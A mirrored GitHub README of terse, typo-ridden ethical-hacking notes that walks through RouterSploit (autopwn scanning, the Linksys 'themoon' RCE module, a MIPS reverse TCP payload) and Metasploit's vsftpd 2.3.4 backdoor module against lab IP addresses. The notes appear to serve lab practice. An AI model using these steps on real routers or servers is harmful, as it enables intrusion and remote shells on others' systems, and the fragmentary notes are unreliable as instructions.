Code Monkey home page Code Monkey logo

ethicalgo's Introduction

Routersploit

blupy apt update && apt install routersploit

https://github.com/threat9/routersploit

python3 rsf.py cd /routerspoit show all search cisco search type=exploits search device=cameras exit git pull

Real Exploit. ping 192.168.0.1

ls /root/routersploit

rsf.py show options

set run

use scanners/autopwn show options

set target 192.168.0.1

run use exploits/

use exploits/routers/ use exploits/routers/tplink

use exploits/routers/linksys/eseries_themoon_rce show options set target run

show payloads set payload mipsle/revers_tcp

ifconfig set lhost ipaddress run

Riposte

Reconosence

nmap target vsftpd

https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

In Kali Metasploit tip: View all productivity tips with the tips command

msf5 > search vsftpd

Matching Modules

Name Disclosure Date Rank Check Description


0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.0.2.4 RHOST => 10.0.2.4 msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description


RHOSTS 10.0.2.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 21 yes The target port (TCP)

Exploit target:

Id Name


0 Automatic

ethicalgo's People

Watchers

James Cloos avatar  avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.